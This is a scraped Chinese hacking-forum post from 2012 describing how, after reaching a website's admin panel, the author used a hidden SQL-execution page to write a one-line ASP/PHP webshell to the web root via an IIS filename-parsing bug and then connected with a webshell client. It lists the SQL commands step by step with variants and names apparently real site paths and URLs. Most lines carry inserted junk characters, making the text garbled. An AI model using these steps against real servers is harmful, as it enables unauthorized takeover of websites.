好不容易进了后台,发现啥上传啊。备份啊多木有。
0 C! H. M$ x' [& m8 Lwebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
$ m/ b3 E) T8 y4 C ^1 k8 X6 R文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
; l) @& c( L, x然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:5 H, A! Y8 O. ?
1.create table cmd (a varchar(50))& F2 L% m- I" f9 E: v [( K
2.insert into cmd (a) values (‘‘)3 I- A, Z1 w+ ?
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
2 t7 `2 V& T( @5 G; i(把表cmd的内容导出为物理路径的一个EXCEL文件)
$ A+ S$ {, ~# i+ P4 Z4.drop table cmd
1 K6 y, y1 ?) G2 ?/ f. o3 K: Q利用IIS的BUG成功拿到了WEBSHELL。
9 c2 H/ g) e/ V' L2 {% L1 B4 a
7 x0 x; F2 F' F5 c& H, b# ]# A直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
2 |" S0 X' {0 d% o2 N6 B
/ M m' y' _$ f SQL语句意思解释:
" |" Q6 w y% O( Y: @+ x* V6 k' t 第一句( L5 T+ C; a; G1 ~
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
- A% j- A P+ y: Y5 A+ }( D( d/ A
第二句
* L/ y& K9 b6 h% L$ r$ x 在表cmd的a字段插入一句话木马9 A' H4 ?8 P& i. R F
第三句
/ r; S1 m- v6 } 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
* |: O, z4 j. S2 x, @
! Y* S/ Z7 L( A& J r9 X. M 第四句
4 K2 e$ g5 p5 {1 O 删除建立的cmd表, K4 J; `( k8 \1 U& `
0 A5 Q5 ]$ t! t+ ]8 q
以下内容为测试:7 L0 _. k5 z8 \! U" f6 ]. m
Access利用后台SQL执行命令功能导出WebShell: s9 G6 \4 D- ]
这个更简单:
( t$ I1 U3 I& l9 X, m [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
1 {) H! w3 r/ x @ 或者
8 v% Y) @- z4 [; ~4 i [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
! u4 \) V M' z5 Z6 P8 G0 h7 p9 j1 T
后台有执行SQL语句功能(vote为已知表段)
, k: O% s* Z0 S8 |3 _/ a9 M 希望对大家有所帮助拿shell的又一个思路0 a2 y% G' j, o7 O
|
发表于 2012-9-13 17:53:58
收藏
支持
反对